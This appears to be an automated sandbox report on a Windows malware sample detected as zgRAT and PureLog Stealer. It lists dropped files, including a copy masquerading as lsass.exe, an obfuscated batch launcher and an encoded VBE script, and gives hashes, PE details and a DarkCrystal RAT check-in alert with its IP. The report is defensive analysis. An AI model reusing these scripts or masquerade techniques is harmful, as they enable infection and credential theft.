Category:	dropped
Size (bytes):	1918976
Entropy (8bit):	7.538029979348699
Encrypted:	false
SSDEEP:	49152:0Dqxm2S5zNBeo3O4KzS5eBtXLyS/DSH36dc:0D2gT3OhweBdyS/uX
MD5:	9FC3AB56804D6BA50E840846783E8AC1
SHA1:	ED6D70605EBE68934004C571A7F503B1432FEB77
SHA-256:	13E5168099CA33F17C96A1F842DED5E99555D0AEFED8E4F8EFEF96FBDCAC7BBA
SHA-512:	593BBD2AC3D0AC8A445D7CC7214E5F1A8AED2120AB098CBEA2E3120A901480E707B45300A81E0E699A82342E516AFF31C70026406B48D428D1A82E4D25DB5DE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................@..........>^... ...`....@.. ....................................@..................................]..K....`.. ............................................................................ ............... ..H............text...D>... ...@.................. ..`.rsrc... ....`.......B..............@....reloc...............F..............@..B................ ^......H...........L...............u..h].......................................0..........(.... ........8........E........q...)...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z......0.......... ........8........E............P...........\...o...8....~....(Q... .... .... ....s....~....(U....... ....~....{....:....& ....8....r...ps....z8.... ........8l...~....9.... ........8T......... ....~....{....9>...& ....83...8

C:\Windows\Globalization\Time Zone\6203df4a6bafc7

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with very long lines (770), with no line terminators
Category:	dropped
Size (bytes):	770
Entropy (8bit):	5.912560575313746
Encrypted:	false
SSDEEP:	12:absa/bnzf5MD5y/h5WGHLPmhwodyx8Ue7V7y1+A9D0l9GBWdO5DouIdVBMdbrCs:wt/5MD09HyhxyKrVqh9gDO5DoLrs
MD5:	B633AA438D8E83FF858CD3BFE5D4E418
SHA1:	AC7596460B0923D980B2BA52DA2D53D0ACC7F596
SHA-256:	D3C2D265A032901C1A21AE5C561F9442114A8FE716CC72BD70BB8EC0CFB7780B
SHA-512:	ECE9B1477896BED5EE7EC9D16D9A8FEA84CAACDD7B9C174CE2620D3A69D79666C213C77214A3DB6CE6DE33570DBC762EA226C58A983990767637667EA5230187
Malicious:	false
Preview:	zJgcnudevCMi8EypLUIOwak1OpzcLBUm9vwkmVROJCrfTUcQoLO7sl8ZjpN84BStrkjMRNDzD3EusEh4MixAwW3XxXB7HSTIt7xtvQ9bIZ4yhOqeITvVNS7VqLZ3MGruj5AvQxI6jW2XcE0iqgyyh85bAcCj1FPBrJPlN5NULzw0aj2lU0MpR3NlAjuxuiFdH0qTzOVvSenrMEAbkaOB2jtx5nloLajmuStj2jvGebWxQfZ5iSNUTDlhG2XMnrj24B73VaiApIgaN6hZOqF2MPSqrLdAMjcx1d2PifjHuMoLhKTKU786mrqosRMK7iyFqtjuDS1sH7I9kHIg1TpOlfLKxNgRSYKLYjeyljGCGPzojqElIpSo3jdKhY7zwjZsx6lBmU5SMnHVqglGJ4ImGfSyFUQMmQPgzH1mFD9xuAbQbIeBx0p1bwlRow5REtp6Xlfjp8AG5U2GECW70PYwkYFCfk8THrtBUf20m4Vzzj5G4fNlZ7bzU3V9fdDF9r8Ol1wiJgV53j6Bc9I9XW3KP4qaK3UJ1Q0HlqeCtoc3mf5u7UggUDsmyy8qKVYQLMEmtyaweFQs4Aiu85d0XxyxiNTwry1XPMrZbTBI3uCOx9sxQOsO2i3XXRDfenEqN2dsSITp4U6nvj9jffgcFnfqTTCJPfnQpWA4fAeI5CUhmPmxReA9GlkkWwZ9GJaYqp7ZiEDfAYhDS8EDqO1ueoJEvahskfBwm606SNPMaf8sEhSYsVS1Rp3Cg3nIgU4fWvaVHI

C:\Windows\Globalization\Time Zone\lsass.exe

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1918976
Entropy (8bit):	7.538029979348699
Encrypted:	false
SSDEEP:	49152:0Dqxm2S5zNBeo3O4KzS5eBtXLyS/DSH36dc:0D2gT3OhweBdyS/uX
MD5:	9FC3AB56804D6BA50E840846783E8AC1
SHA1:	ED6D70605EBE68934004C571A7F503B1432FEB77
SHA-256:	13E5168099CA33F17C96A1F842DED5E99555D0AEFED8E4F8EFEF96FBDCAC7BBA
SHA-512:	593BBD2AC3D0AC8A445D7CC7214E5F1A8AED2120AB098CBEA2E3120A901480E707B45300A81E0E699A82342E516AFF31C70026406B48D428D1A82E4D25DB5DE9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Globalization\Time Zone\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Globalization\Time Zone\lsass.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................@..........>^... ...`....@.. ....................................@..................................]..K....`.. ............................................................................ ............... ..H............text...D>... ...@.................. ..`.rsrc... ....`.......B..............@....reloc...............F..............@..B................ ^......H...........L...............u..h].......................................0..........(.... ........8........E........q...)...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z......0.......... ........8........E............P...........\...o...8....~....(Q... .... .... ....s....~....(U....... ....~....{....:....& ....8....r...ps....z8.... ........8l...~....9.... ........8T......... ....~....{....9>...& ....83...8

C:\webCrt\3dcb0eb9430f8d

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	242
Entropy (8bit):	5.7733410863172185
Encrypted:	false
SSDEEP:	6:yAShiNBdwvp2oLVOCu5QtklbekBSqmxd+QzQOaLVg:ehiNBdwvpxLXIlbu77+mQOaL2
MD5:	2AC87099350BAD82A4982316092F6B44
SHA1:	781C199F870AAF04C502C7117AAE8FEE2B21B3A6
SHA-256:	0E9EDD99F8863077258E365D74CDCEB50D6B77521F444BA0C1C95B12A575BDEE
SHA-512:	F27AA18E88CFE6AF4AADEA08FA85D50CB5FE464A16C0BDB3F6C60CCCE32EB4760A5B3E27AC8DA00451CD875583DA9896E5E442EE82AD73D77E107A6600A93471
Malicious:	false
Preview:	HJAPNJe7CyaYjGqGldVTG6Rkky3nV4VE3ZAXTpSMQdTSrW428NXNGqIL1aoYQ1lIcVeKFSw6KICnn82O4AoHgI8NRzg3A35Z1KzV1uwqbaC7oeh3iadQMdlUXR3Qw25RMnvcIgWKN7qFGAjwRmVkZpMXif8k0g4ievuAtFuBETCOxgNWsG8JhV1haY4mivTrDHkVPiDM2TgGn7jCSl2uhvBJ3NkULHcSAULq52HJDwQNzv4cy1

C:\webCrt\EeMFgDHDyZvTl.exe

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1918976
Entropy (8bit):	7.538029979348699
Encrypted:	false
SSDEEP:	49152:0Dqxm2S5zNBeo3O4KzS5eBtXLyS/DSH36dc:0D2gT3OhweBdyS/uX
MD5:	9FC3AB56804D6BA50E840846783E8AC1
SHA1:	ED6D70605EBE68934004C571A7F503B1432FEB77
SHA-256:	13E5168099CA33F17C96A1F842DED5E99555D0AEFED8E4F8EFEF96FBDCAC7BBA
SHA-512:	593BBD2AC3D0AC8A445D7CC7214E5F1A8AED2120AB098CBEA2E3120A901480E707B45300A81E0E699A82342E516AFF31C70026406B48D428D1A82E4D25DB5DE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................@..........>^... ...`....@.. ....................................@..................................]..K....`.. ............................................................................ ............... ..H............text...D>... ...@.................. ..`.rsrc... ....`.......B..............@....reloc...............F..............@..B................ ^......H...........L...............u..h].......................................0..........(.... ........8........E........q...)...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z......0.......... ........8........E............P...........\...o...8....~....(Q... .... .... ....s....~....(U....... ....~....{....:....& ....8....r...ps....z8.... ........8l...~....9.... ........8T......... ....~....{....9>...& ....83...8

C:\webCrt\Surrogatedll.exe

Download File

Process:	C:\Users\user\Desktop\kqq1aAcVUQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1918976
Entropy (8bit):	7.538029979348699
Encrypted:	false
SSDEEP:	49152:0Dqxm2S5zNBeo3O4KzS5eBtXLyS/DSH36dc:0D2gT3OhweBdyS/uX
MD5:	9FC3AB56804D6BA50E840846783E8AC1
SHA1:	ED6D70605EBE68934004C571A7F503B1432FEB77
SHA-256:	13E5168099CA33F17C96A1F842DED5E99555D0AEFED8E4F8EFEF96FBDCAC7BBA
SHA-512:	593BBD2AC3D0AC8A445D7CC7214E5F1A8AED2120AB098CBEA2E3120A901480E707B45300A81E0E699A82342E516AFF31C70026406B48D428D1A82E4D25DB5DE9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................@..........>^... ...`....@.. ....................................@..................................]..K....`.. ............................................................................ ............... ..H............text...D>... ...@.................. ..`.rsrc... ....`.......B..............@....reloc...............F..............@..B................ ^......H...........L...............u..h].......................................0..........(.... ........8........E........q...)...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z......0.......... ........8........E............P...........\...o...8....~....(Q... .... .... ....s....~....(U....... ....~....{....:....& ....8....r...ps....z8.... ........8l...~....9.... ........8T......... ....~....{....9>...& ....83...8

C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat

Download File

Process:	C:\Users\user\Desktop\kqq1aAcVUQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	5.270635940920073
Encrypted:	false
SSDEEP:	3:lKRNEQPeVdAfO0/EvAH6CJ4A9q8B8a/n:IN/PKdQJ/qsq0/n
MD5:	94C4E83CDEB3852269278EF44DC2F811
SHA1:	93F3F8AA1D9EBE13989BEB442E06BFE708A6E375
SHA-256:	2B24E9C2DDBBBF496644F38CD4EC9A90D980AF7C773F9617E8632F08A0182A0D
SHA-512:	8FBB0EF6DE20E68AA47E912FDDEEA4EE2559DB978F15033D6E3F7D5881FED735680D6746DF8494471436E3ABC0B6E2B478B1290BEB1E4C29A2C3602E67322C97
Malicious:	false
Preview:	%ezaNtwyVkcgL%%kZjYjpb%..%MgkFmbTHvZWRhg%"C:\webCrt/Surrogatedll.exe"%YaAvuODJoavTpQD%

C:\webCrt\ece20bc968502b

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with very long lines (811), with no line terminators
Category:	dropped
Size (bytes):	811
Entropy (8bit):	5.893156336685444
Encrypted:	false
SSDEEP:	24:DAuDeseLVEKZm39zB4zuFhrVToyV+zxhhN8Qmvj3N:c5WK69fm6kN8QIN
MD5:	D20B271322966A31A03FEE487D7D9B2F
SHA1:	679FF218134536044590CDFE68074CE06C823674
SHA-256:	4BCA3D4454DAB2953C6EE9989D8177B06A505EF4E0C2CEEC83A0314C5D7B4239
SHA-512:	DEB24C6DB6ABDABD0B661F8EEECB14A752DBC883B60D516B3BAE92CAE4DC9C94B49661861A06749F7A8CAFBEF35C7F4581545B6DF9C52FBDF31D2D68E447325C
Malicious:	false
Preview:	FtltWRep07uVLiO0WpdQ5HaPb1xA0B2zt58OW3hmLaVAz9SeNWvBa637TVSfeezyF5mQk9ecI1EewZZbjSwdQ0YxCB5AkCIrlg54XC4O2S2j1YK3605LrVhOgzOiEd1GtX3QeeEhYik87z5n0BEuG79P8qYiyVJZaw0ef4ZbvYxJujQq3ksDZH9wXnRxGgtCYLiL9aI6lm8sJ0eZZroNnGASwEH2mmUPouujAFqdcvbwIRmhI2XZ1fYSLPY5TQU9SsDZF5YUALv2pNKfcjttO5XJVcYvqvJLbceZNMbNeDYqugn7F2dtgkuWV4DngnnPBjbNsuSPIfPLgrYyyapyRap0rHESJxq0ZJpKFaOVkOlAVi0ofOyG8z7k4kflp9GUzYwXBOtYLTNDyoeIRax48k2kLEQe4nplHRL6wcmRfa4ol3wQGWTOMMVOgML77Oeiom5hciWyyfYiqO8SSAYhTbZ557ZkRpTR5WA97OyhAeaqxwiSN3o7z6OMNAleIwhILHnTN9UDM0hzAsIIZHWYAWb9Ixw7mTZN7RepJOEOilv8YZMe1dEBZIIzqnLaMWb2bT1sOc9LCIzZkdktkRFJOYyzJo9fCnBMK2gFhdQYd38RSsPMDcz5RRoDfBjjddIYGnPr6eLHBqpUZggaZwbkxG42Odjf4q5AvjLpdhQiQs3klTn8fIKqBhl9sXcc5pMVvpj0V171f2UENUQ5zlAvfO8N8L6GFxnkgiz6txnoLTLJNgwYGgnUpazgrV1J40wrPtiofUMB7VkMDzAcZi9iKT5FsSOY5duUgd3e7H2wUlW

C:\webCrt\gSYhm1mlqujwdrrg55.vbe

Download File

Process:	C:\Users\user\Desktop\kqq1aAcVUQ.exe
File Type:	data
Category:	dropped
Size (bytes):	242
Entropy (8bit):	5.925898804397635
Encrypted:	false
SSDEEP:	6:GjvwqK+NkLzWbHK/818nZNDd3RL1wQJRQtymfDe4SnUMdj:GiMCzWLKG4d3XBJatymfCVj
MD5:	474AB11ABE2A295E033DBC94BAAB19B2
SHA1:	FC07A5E2F7246D11B9A06D5656FED8A99E0CA24E
SHA-256:	4EBA79E794EAC54029A51C2B8AD5A012F316BDC92E7CE8EF5018EF8AB726EA2B
SHA-512:	890C9867D3EB6D36EC87A135D204DE4A6168B9B3DE21F2FDA6ABD1CFF99518E90698870F0D5A78CB97D785125090DDF78543473245DFC2E16B83620147DDE910
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^2QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJhn(ZMYzJ4VoLo\tV8Vj6ttC9J5\b6^9Lhx?!Xz:UKK\\;8]wI4tUAowp$}FUh^\Kxec4mYJBPZSP6ls/.WEYAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.621947447102293
Encrypted:	false
SSDEEP:	12:PYI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:DdUOAokItULVDv
MD5:	3C2549B8E8B5460A95748CCC3CD1BEA8
SHA1:	99895C6D36EC820FE6A210E186B09AF7CD089696
SHA-256:	EAFA177E97F49A260A5951D5B4EC13790F9D909597F417523B07109A96482BF7
SHA-512:	A75E3251EAD6D1CDDB9D54ED989FCD1817A395745C831BF8EAF70CED5EA62C7B5B957C699391D3664CF401B88E97E2E8112C5C2AB94FEC39B22564A56D6D43D0
Malicious:	false
Preview:	..Pinging 936905 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.908865265029448
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kqq1aAcVUQ.exe
File size:	1'769'994 bytes
MD5:	6697a39548b61fcfcf800b206bdbd696
SHA1:	85229cee44c412c1f0f6a17562272a1296072815
SHA256:	ff3ec61937bba7d0b4fd993698f3d2a8ba77e4630ed293e4a3e3d0254dc1de50
SHA512:	6d0a4dc554e9df2fac49edbf8589e50e891481f6601c1a1e537d0c1243a8d7d873e54f84ccce04edd5346b50857f7601fafeb8856fc3e75d4283581071521572
SSDEEP:	49152:IBJMrYgX9QdEa4gVH+pPnyBS8V6HU5NtvAWn2/x:yO3X9QVbIpavZ5NX8x
TLSH:	8E852202B8C588B1D1AA1D336E395B21B93E7D602F628FDB63A01B5DDD315C0DB357A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F268CB2A85Bh
jmp 00007F268CB2A16Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F268CB1CFB7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F268CB2D5FFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F268CB2A2FCh
push 0000000Ch
push esi
call 00007F268CB298B9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F268CB1CF32h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F268CB2D0B9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F268CB2A278h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F268CB2D09Ch
int3
jmp 00007F268CB2EB37h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T03:12:19.123901+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.6	49737	172.67.186.200	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 03:12:17.812365055 CET	49737	80	192.168.2.6	172.67.186.200
